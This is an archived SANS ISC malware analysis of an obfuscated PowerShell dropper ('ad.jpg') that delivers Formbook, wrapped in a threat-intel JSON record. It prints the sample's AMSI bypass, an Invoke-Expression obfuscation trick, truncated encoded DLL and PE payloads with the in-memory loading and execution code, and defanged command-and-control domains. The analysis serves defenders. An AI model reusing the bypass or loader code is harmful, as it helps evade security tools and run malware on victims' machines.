{
	"id": "db9b8094-adc2-406f-a51f-479c2be94837",
	"created_at": "2026-04-06T00:17:25.321891Z",
	"updated_at": "2026-04-10T03:21:53.514591Z",
	"deleted_at": null,
	"sha1_hash": "e173bb3f96f7098c5d1b4c4154813b77779b9f05",
	"title": "PowerShell Dropper Delivering Formbook - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1505140,
	"plain_text": "PowerShell Dropper Delivering Formbook - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 16:29:20 UTC\r\nHere is an interesting PowerShell dropper that is nicely obfuscated and has anti-VM detection. I spotted this file yesterday,\r\ncalled 'ad.jpg' (SHA256:b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088). Of course, it's not\r\na picture but a huge text file with Base64-encoded data. The VT score is therefore interesting: 0/61![1]. Once decoded, we\r\ndiscover the obfuscated PowerShell code. Let's review the techniques implemented by the attacker.\r\nFirst, we see this at the very beginning of the script:\r\n[Ref].Assembly.GetType('System.Management.Automation.'+$([CHAr]([Byte]0x41)+[ChAr]([bYTe]0x6D)+[Char](82+33)\r\n[ChAr]([BYTe]0x69))+'Utils').GetField($([SyStEM.Net.WEBUTilItY]::htMLdeCode('\u0026#97;\u0026#109;\u0026#115;\u0026#105;\u0026#73; \\\r\n\u0026#110;\u0026#105;\u0026#116;\u0026#70;\u0026#97;\u0026#105;\u0026#108;\u0026#101;\u0026#100;')),'NonPublic,Static').SetValue($null,$true);\r\nWhich is deobfuscated into:\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils.amsiInitFailed)),'NonPublic,Static').SetValue\r\nThis piece of code comes from the PoSHBypass[2] project. It's a  proof of concept that allows an attacker to bypass\r\nPowerShell's Constrained Language Mode, AMSI and ScriptBlock, and Module logging.\r\nThen, classic behaviour, we have an obfuscation of the Invoke-Expression cmdlet:\r\n$ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID='MEX'.replace('M','I');\r\nsal g $ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID;\r\nThis code will make 'g' an alias of Invoke-Expression. This is used immediately to decode and execute the following\r\nchunk of data:\r\n[Byte[]]$IMAGE_NT_HEADERS=('@1F,@8B,@08,@00,@00,@00,@00,@00,@04,@00,@ED,@BD,@07,@60,@1C,@49,@96,@25,@26,@2F,\r\n@F5,@4A,@D7,@E0,@74,@A1,@08,@80,@60,@13,@24,@D8,@90,@40,@10,@EC,@C1,@88,@CD,@E6,@92,@EC,@1D,@69,@47,\r\n@23,@29,@AB,@2A,@81,@CA,@65,@56,@65,@5D,@66,@16,@40,@CC,@ED,@9D,@BC,@F7,@DE,@7B,@EF,@BD,@F7,@DE,@7B,\r\n@EF,@BD,@F7,@BA,@3B,@9D,@4E,@27,@F7,@DF,@FF,@3F,@5C,@66,@64,@01,@6C,@F6,@CE,@4A,@DA,@C9,@9E,@21,@80,\r\n...\r\n@34,@6F,@8F,@7E,@8D,@1F,@23,@18,@C7,@CC,@FF,@18,@F3,@84,@A0,@83,@EB,@FB,@70,@EE,@D3,@BB,@BB,@0A,@6B,\r\n@C7,@D2,@E4,@47,@CF,@FF,@B7,@9E,@5F,@E3,@E5,@AF,@43,@5C,@4C,@72,@77,@FF,@FF,@63,@78,@FF,@E8,@F9,@46,\r\n@9E,@FF,@07,@78,@61,@2A,@8D,@00,@42,@04,@00,@00'.replace('@','0x'))| g;\r\nThe result string is passed to the following function:\r\nfunction JAPFYAQPECMKYQNLCJXCOFSVYMER {\r\n [CmdletBinding()]\r\nhttps://isc.sans.edu/diary/26806\r\nPage 1 of 5\n\nParam ([bYte[]] $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)\r\n Process {\r\n $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput = New-Object System.IO.MemoryStream( , $VDLXLPBUCEUOIHNKREBMWCWEFMERb\r\n $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut = New-Object System.IO.MemoryStream\r\n $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE = New-Object System.IO.Compression.GzipStream $WRSWR\r\n $EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL = New-Object bYtE[](1024)\r\n while($tRUe){\r\n $BBYRATZNTGIAUBPDRVBIQAMRDMERREread = $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE.Read($EONFFJ\r\n if ($BBYRATZNTGIAUBPDRVBIQAMRDMERREread -lE 0){bReAk}\r\n $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.Write($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, $BBYRATZNTGIAU\r\n }\r\n [bYte[]] $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT = $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.ToArray()\r\n }\r\n}\r\nIt will uncompress the buffer and generate a DLL\r\n(SHA256:A7D74BE8AF1645FBECFC2FE915E0B77B287CE09AD3A7E220D20794475B0401F9) which is not present\r\non VT at this time. This DLL is injected in the PowerShell process:\r\n[bYte[]]$decompressedByteArray = JAPFYAQPECMKYQNLCJXCOFSVYMER $IMAGE_NT_HEADERS\r\n$t=[System.Reflection.Assembly]::Load($decompressedByteArray)\r\nThen, another chunk of data is decoded:\r\n[Byte[]]$HNAUVVBGYKNXXMOTZHSTOHTKRMID=('@4D,@5A,@45,@52,@E8,@00,@00,@00,@00,@58,@83,@E8,@09,@8B,@C8,@83,@C0,\r\n@FF,@E1,@90,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,\r\n@00,@00,@00,@00,@00,@00,@C0,@00,@00,@00,@0E,@1F,@BA,@0E,@00,@B4,@09,@CD,@21,@B8,@01,@4C,@CD,@21,@54,@68,@69,\r\n@73,@20,@70,@72,@6F,@67,@72,@61,@6D,@20,@63,@61,@6E,@6E,@6F,@74,@20,@62,@65,@20,@72,@75,@6E,@20,@69,@6E,@20,\r\n...\r\n0,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@0\r\nThis is the main payload dropped by the Powershell\r\n(SHA256:A07AE0F8E715E243C514B8DA6FD83C5955E1C8EDE5EEBF4D6494EE97443AAD95). Same here, it's not\r\navailable on VT yet.\r\nThe payload is executed via the following code:\r\n[QuotingUtilities]::SplitUnquoted('control.exe',$HNAUVVBGYKNXXMOTZHSTOHTKRMID)\r\nThis function is provided by the injected DLL:\r\nhttps://isc.sans.edu/diary/26806\r\nPage 2 of 5\n\nThis function implements an interesting anti-VM check that, if running in a virtualized environment, stop the Powershell\r\nand prevent the payload to be executed:\r\nNote that I don't know why a popup message is displayed. The goal of malware is to operate below the radar... (maybe the\r\ncode is still being debugged by the attacker?)\r\nHere is how the VMware environment is detected:\r\nhttps://isc.sans.edu/diary/26806\r\nPage 3 of 5\n\n(Maybe there are other tests performed but I did not investigate further)\r\nThe DLL is also obfuscated with a tool that I never met before:\r\nIf you have more information about this \"Zephyrus Protector\" tool, please share with me!\r\nThe Formbook sample tries to contact the following hosts:\r\nwww[.]zenhalklailiskiler[.]online \r\nwww[.]insights-for-instagram[.]com \r\nwww[.]ketaminetherapycalgary.com \r\nwww[.]forwardslashdevelopment[.]com \r\nwww[.]arikmertelsanatlari[.]xyz\r\nwww[.]bklynphotography[.]com \r\nwww[.]experiencewinneroftheyear[.]com \r\nwww[.]kansas-chiefs[.]com \r\nwww[.]vrefirsttime[.]com \r\nwww[.]issahclothing[.]com \r\nwww[.]denver-nuggets[.]club \r\nwww[.]wwwhookeze[.]com\r\nwww[.]moxieadvice[.]com \r\nwww[.]gangtayvietnam[.]com \r\nhttps://isc.sans.edu/diary/26806\r\nPage 4 of 5\n\nwww[.]cosmosguards[.]com \r\nwww[.]magentx2[.]info\r\n[1] https://www.virustotal.com/gui/file/b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088/detection\r\n[2] https://github.com/davehardy20/PoSHBypass\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/26806\r\nhttps://isc.sans.edu/diary/26806\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/26806"
	],
	"report_names": [
		"26806"
	],
	"threat_actors": [],
	"ts_created_at": 1775434645,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.pdf",
		"text": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.txt",
		"img": "https://archive.orkl.eu/e173bb3f96f7098c5d1b4c4154813b77779b9f05.jpg"
	}
}